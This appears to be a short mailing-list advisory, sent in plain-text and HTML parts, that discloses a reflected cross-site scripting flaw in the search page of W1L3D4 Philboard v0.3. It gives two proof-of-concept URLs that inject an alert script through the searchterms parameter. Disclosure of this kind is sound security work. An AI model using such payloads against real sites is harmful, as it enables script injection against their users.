------=_Part_113167_26183988.1185316931798
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

W1L3D4 Philboard v0.3 XSS Vulnerability

#Software: W1L3D4 Philboard v0.3
#download: http://www.aspindir.com/goster/4891
#demo: http://sgportal.somee.com/
#Found By: GeFORC3  |  G3

#Exploit:

http://site.com/script_path/W1L3D4_aramasonuc.asp?searchterms=
"><script>alert("g3");</script>

http://site.com/script_path/W1L3D4_aramasonuc.asp?searchterms=%22%3E%3Cscript%3Ealert%28%22g3%22%29%3B%3C%2Fscript%3E&searchuser=

This xss works on W1L3D4 Philboard v0.3 search (arama)


WwW.GeFORC3.Org  |  WwW.HeykirBlog.Org  |  WwW.NetKaBus.Com

------=_Part_113167_26183988.1185316931798
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

W1L3D4 Philboard v0.3 XSS Vulnerability<br><br>#Software: W1L3D4 Philboard v0.3<br>#download: <a href="http://www.aspindir.com/goster/4891">http://www.aspindir.com/goster/4891</a><br>#demo: <a href="http://sgportal.somee.com/">
http://sgportal.somee.com/</a><br>#Found By: GeFORC3&nbsp; |&nbsp; G3<br><br>#Exploit:<br><br><a href="http://site.com/script_path/W1L3D4_aramasonuc.asp?searchterms=">http://site.com/script_path/W1L3D4_aramasonuc.asp?searchterms=</a>
"><script>alert("g3");</script><br><br><a href="http://site.com/script_path/W1L3D4_aramasonuc.asp?searchterms=%22%3E%3Cscript%3Ealert%28%22g3%22%29%3B%3C%2Fscript%3E&searchuser=">http://site.com/script_path/W1L3D4_aramasonuc.asp?searchterms=%22%3E%3Cscript%3Ealert%28%22g3%22%29%3B%3C%2Fscript%3E&searchuser=
</a><br><br>This xss works on W1L3D4 Philboard v0.3 search (arama)<br><br><br><a href="http://WwW.GeFORC3.Org">WwW.GeFORC3.Org</a>&nbsp; |&nbsp; <a href="http://WwW.HeykirBlog.Org">WwW.HeykirBlog.Org</a>&nbsp; |&nbsp; <a href="http://WwW.NetKaBus.Com">
WwW.NetKaBus.Com</a>

------=_Part_113167_26183988.1185316931798--